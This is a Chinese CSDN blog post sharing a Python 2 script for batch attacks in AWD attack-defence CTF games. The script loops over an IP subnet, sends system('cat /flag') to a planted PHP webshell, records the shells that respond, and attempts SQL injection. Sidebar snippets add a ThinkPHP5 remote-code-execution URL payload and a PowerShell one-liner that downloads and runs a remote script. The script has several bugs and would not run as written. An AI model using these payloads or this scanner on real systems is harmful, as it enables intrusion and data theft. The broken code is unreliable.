awd的批量脚本 pwn_可扩展批量攻击脚本.py

最新推荐文章于 2024-08-15 09:11:15 发布
最新推荐文章于 2024-08-15 09:11:15 发布
阅读量776 收藏 1
点赞数
文章标签: awd的批量脚本 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35033082/article/details/112041498
版权
这是一个用于批量攻击的 Python 脚本,主要针对 AWD 平台,实现了单字节 webshell 和 SQL 注入攻击。脚本包含了自定义 payload 函数,如 oneword() 和 sql_inject(),并提供了针对不同方法的参数配置。通过指定的主机域名、网段、端口和攻击方法,脚本将尝试连接并执行攻击,将成功结果写入文件。
摘要由CSDN通过智能技术生成

# -*- coding: UTF-8 -*

#//========================================================================================

#//

#// ## ## ###### ## ## ## ## ## ### ###

#// ## ## ## ## ## ## ## ## ## # # ##

#// ## ## ## ####### ## ## ## ## ## ##

#// ## ## ## ## ## ## ## ## ## ##

#// ###### ## ## ## ## ## ##### ## ##

#//

#//========================================================================================

import requests

import sys

import getopt

# ---------------------------------------------------------------------------- #

# 自定义payload函数 #

# ---------------------------------------------------------------------------- #

def oneword(url):

#根据实际情况调整

passwd="g"

payload = {passwd: 'system(\'cat /flag\');'}

path = "/Upload/xiaoma.php"

url = url+path

webshelllist = open("webshelllist.txt","a")

try:

res = requests.post(url, payload, timeout=1)

if res.status_code == res.codes.ok:

result = url+" connect shell sucess,flag is "+res.text

print result

print >>flag,result

print >>webshelllist,url+","+passwd

else:

print "shell 404"

except:

print url+" connect shell fail"

def sql_inject(url):

#自定义payload

payload = "select username,passwd from USER"

#sql注入路径

path = "/admin.php?submit="

url = url+path

try:

res = requests.get(url,payload,timeout=1)

res = res.text

#可根据正则匹配扩展,懒得写了

if res.find('Invalid') == -1 and res.find('error')==-1:

result = url+" sql inject sucess, flag is "+res

print result

print >>flag,result

else:

print " sql error"

except:

print url+" sql inject fail"

# ---------------------------------------------------------------------------- #

# 定义参数方法 ,根据自己定义的payload函数修改条件 #

# ---------------------------------------------------------------------------- #

def method(url, method):

method = sys.argv[2]

if method == "oneword":

oneword(url)

elif method == "sqli":

sql_inject(url)

# ---------------------------------------------------------------------------- #

# 执行攻击 #

# ---------------------------------------------------------------------------- #

# host="http://192.168.1"+segment="1 to 255"#主机域名+网段

def exploit(host, seg_start, seg_stop, port, method):

global flag

for i in range(seg_start, seg_stop):

url = host+"."+str(i)+":"+port

flag = open("flag.txt","a")

try:

method(url, method)

except:

print url+"expolit fail"

continue

flag.close()

def usage():

print "AWD批量攻击脚本 by Lithium"

print

print "Usage: exploit.py -h [host] -a [seg_start] -b [seg_stop] - p [port] -m [method]"

print

print "-h --hosthost to C name, examples:192.168.0"

print "-a --seg_startnetwork segment range start, range is 0 to 255"

print "-b --seg_stopnetwork segment range stop, range is 0 to 255"

print "-p --portthe port which services denpend on, range is 0, 65535 (Most Web Service is at 80)"

print "-m --methodthe exploit method, denpends on your define"

print

print "Examples:"

print "exploit.py -h 192.168.0 -a 30 -b 51 -p 80 -m oneword"

print "exploit.py -h 192.168.0 -a 30 -b 51 -p 80 -m sqli"

sys.exit(0)

if __name__ == '__main__':

print "//========================================================//"

print "// //"

print "// ## ## ###### ## ## ## ## ## ### ### //"

print "// ## ## ## ## ## ## ## ## ## # # ## //"

print "// ## ## ## ####### ## ## ## ## ## ## //"

print "// ## ## ## ## ## ## ## ## ## ## //"

print "// ###### ## ## ## ## ## ##### ## ## //"

print "// //"

print "//========================================================//"

if not len(sys.argv[1:]):

usage()

try:

opts, args = getopt.getopt(sys.argv[1:], "Hh:a:b:p:m:", ["help","host", "seg_start", "seg_stop", "port", "method"])

except getopt.GetoptError as err:

print str(err)

usage()

for o,a in opts:

if o in ("-H","--help"):

usage()

elif o in ("-h", "--host"):

host = a

elif o in ("-a", "--seg_start"):

seg_start = a

elif o in ("-b", "--seg_stop"):

seg_stop = a

elif o in ("-p", "--port"):

port = a

elif o in ("-m", "--method"):

method = a

else:

assert False,"Unhandled Option"

exploit(host, seg_start, seg_stop, port, method)

一键复制

编辑

Web IDE

原始数据

按行查看

历史

泼皮士
关注
awd批量脚本 pwn_AWD攻防工具脚本汇总(一)
weixin_39527879的博客
12-20 814
#-*- coding:utf-8 -*-importparamikoimportthreadingimportqueueimporttime#反弹shell pythonq=queue.Queue()#lock = threading.Lock()#ssh 用户名 密码 登陆defssh_base_pwd(ip,port,username,passwd,cmd):port=int(port)ss...
awd批量脚本 pwn_湖湘杯线下AWD记录
weixin_35526110的博客
12-30 844
发现一个 .shell.php菜刀马,密码c ,但是是root权限创建,并且有定时任务一直写入,无法删除,可以选择写一个 while循环删除他。然后根据.shell.php去批量拿flag。#coding=utf-8import requestsimport refrom gevent import poolfrom gevent import monkeyfrom gevent import ...
AWD攻防中读取flag的批量脚本
09-05
AWD攻防中读取flag的批量脚本,可能需要自行修改下
AWD批量攻击脚本使用教程
最新发布
gitblog_00603的博客
08-15 914
AWD批量攻击脚本使用教程 awd_scriptAWD批量攻击脚本(Web/Pwn通用),通过bash编写,远程信息采用参数传入exp,通过多进程方式实现同时攻打,阻塞超时自动结束进程。项目地址:https://gitcode.com/gh_mirrors/aw/awd_script 项目介绍 awd_script 是一个用于AWD(Attack with Defense)比赛的批量攻击脚本,支...
AWD攻击脚本-多线程-批量-打全场-保存flag
BlusKing
09-21 5459
多线程批量attack全场,并输出、保存flag 一、针对文件包含漏洞的脚本 #!/usr/bin/env python # encoding: utf-8 import requests import urllib import time import threading import base64 #批量Get_Flag def init1(): global ...
awd批量脚本 pwn_[原创]第一届护网杯线下决赛awd之shell多解
weixin_39571403的博客
12-20 693
前言好久不打比赛,顺便来北京实习就参加了护网杯。排名虽然有所提高但还是被各种大表哥吊打。(和企业参赛简直痛苦)这里带来决赛中awd比赛pwn题shell的两种漏洞利用方式。程序保护保护全开程序分析程序模拟了一个受限shell命令行的功能。一共有10个shell功能,根据漏洞利用方式可以分为两类。第一类:ls,pwd,passwd,login,exit其中passwd和login是假的利用方式。就是...
AWD批量拿分python脚本
05-12
根据网上版本修改的,现场更好更改参数的版本,减少AWD比赛时的代码修改量,原始版本是网上公有版本,个人觉得哪个版需要改的参数太多浪费了很多比赛时间,可以提前根据自己shell名称改好速度会更快
awd批量脚本 pwn_北极星杯AWD-Writeup
weixin_39966909的博客
12-20 888
前言祝祖国70周年生日快乐,也祝星盟一周年生日快乐.感谢各位师傅在国庆假期抽出时间参加这次比赛,也感谢负责组织比赛的师傅忙前忙后.我是M09ic,负责本次北极星杯AWD的赛后分享.靠着抱大腿以及足够的运气,很荣幸获得了第二名.感谢小远师傅,sayhi师傅,以及Alkaid师傅大哥大嫂国庆好!!!先贴上web题目源码:因为是先上的waf再做的备份,所以看到waf相关的东西师傅们可以无视...web1...
awd批量脚本 pwn_北极星杯 awd复现
weixin_39811101的博客
01-12 990
北极星杯 awd复现服务器共有3个web和一个pwnweb11,down下web1的源码,使用D盾扫描:2,漏洞1:发现三个冰蝎的木马,和一个一句话木马冰蝎的后门需要使用冰蝎的客户端进行连接:如图:一句话木马直接使用菜刀或蚁剑连接即可:3,漏洞2:sqlhelper.php的反序列化漏洞:构造payload:class A{public $name;public $male;function __...
awd批量脚本 pwn_CTF线下赛AWD套路小结
weixin_39784972的博客
12-20 1738
CTF线下赛AWD套路小结本文已在先知社区发表,欢迎访问,链接h最近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了。一、AWD模式简介AWD:Attack With Defence,比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以进行得分,修复漏洞可以避免被其他队伍攻击失分。一般分配Web服务器,服务器(多数为Linu...
awd批量脚本 pwn_记一次AWD反杀之旅
weixin_39611340的博客
12-20 1205
背景星盟团队的内部awd训练,邀请我们团队参加,然后想着也没什么事情就报名了。为什么说叫反杀之旅?因为最开始的时候由于技术师傅的手误,前两轮设置后台check扣分的时候多按了一个0,导致一次check扣了我们1000分。。。本来每个队初始分数是1000,结果我们一下变成了0,成了倒数第一。不过经过团队的紧张的补救以及多年的手速,在多扣了几百分的情况下最后追赶到了正数第二名的位置。觉得还挺有意思,所...
文件包含批量攻击脚本
09-07
基础的文件包含,可以通过该脚本直接获取相应的flag,在awd中好用
PwnWAF:用于AWDpwn日志工具
05-16
PWA文件 用于AWDpwn日志工具 描述 使用traceGen.py生成elf文件。 elf_name:我们要记录哪个elf文件 log_path:日志文件 计算机:此精灵的平台,(仅支持x86 / x86_64) 注意:elf_name和log_path必须是绝对路径 用法: python traceGen.py machine elf_name log_path 例如: python traceGen.py 64 /path/to/elf/test.bin /path/to/log/log.txt elf_name.out是日志文件,然后重命名该文件(或其他文件)以使xinetd引导该文件。 此文件将启动一个子进程以执行elf_name文件,并且父进程将记录信息: +-----+ |child| --> execute /path/to/elf/test.bin
Server-Auto-Pwn:自动Web服务器漏洞扫描程序和漏洞利用程序
05-09
服务器自动拥有 SAP为漏洞利用程序提供了一个平台,可以轻松创建该漏洞利用程序,并将其与从shellcode到jsp的各种不同有效负载一起使用,几乎可以与任何漏洞利用程序一起使用。 此外,通过多阶段的shell处理程序,它还可以利用被攻击的机器提供可靠的tty shell。
WinPwn:内部Windows Penetrationtest AD-Security的自动化
04-29
WinPwn 在过去的许多内部渗透测试中,由于缺少代理支持,我经常遇到有关现有Powershell Recon / Exploitation脚本的问题。 我还经常一个接一个地运行相同的脚本,以获取有关当前系统和/或域的信息。 为了自动化尽可能多的内部渗透测试过程(侦察和开发),并且出于代理的原因,我编写了具有自动代理识别和集成功能的脚本。 该脚本主要基于其他知名的大型进攻性安全性Powershell项目。 欢迎任何建议,反馈,请求和评论! 只需使用以下命令导入模块: Import-Module .\WinPwn.ps1或iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') 要绕过AMSI,请采
AWD攻防比赛 PHP WAF
10-16
AWD攻防比赛 PHP WAF 超强waf,防读flag 比赛用基本可以完美防住
awd批量脚本 pwn_AWD攻防之web入门篇
weixin_29210759的博客
01-01 1846
前言AWD(Attack With Defense,攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取 Flag 分数时,别人会被扣分,同时你也要保护自己的主机不被别人得分,以防扣分。常见操作 1. 修改ssh密码当我们拿到服务器后,需要第一时间修改密码防止被他人窃用 2. 1 修改数...
awd批量脚本 pwn_星盟安全团队10.26AWD训练赛总结
weixin_39633089的博客
01-02 536
前言和往常一样,这次已经是咱们星盟的第六次线上awd比赛了,曾经我问老大这样的意义,老大说了句,玉不琢不成器,本次比赛还是那样刺激,16支队伍实力都挺强,学会了点姿势来总结一下,提示本篇你不一定能学到技术,大佬勿喷,一种思路技巧。骑马打马。。。比赛时间2019年10月26日 19:00内容pwn* 2web* 2比赛规则每个队伍分配到一个docker主机,给定web (web)/pwn(...
awd批量脚本 pwn_星盟安全团队AWD训练赛
weixin_42164702的博客
01-02 1105
web1这个题目我一共找到了四个漏洞。Thinkphp5rce1?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag这个可以直接打,修复方案如下在App.php的第375行加入一个正则的过滤,即可修复,这个是官方的方法,因...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值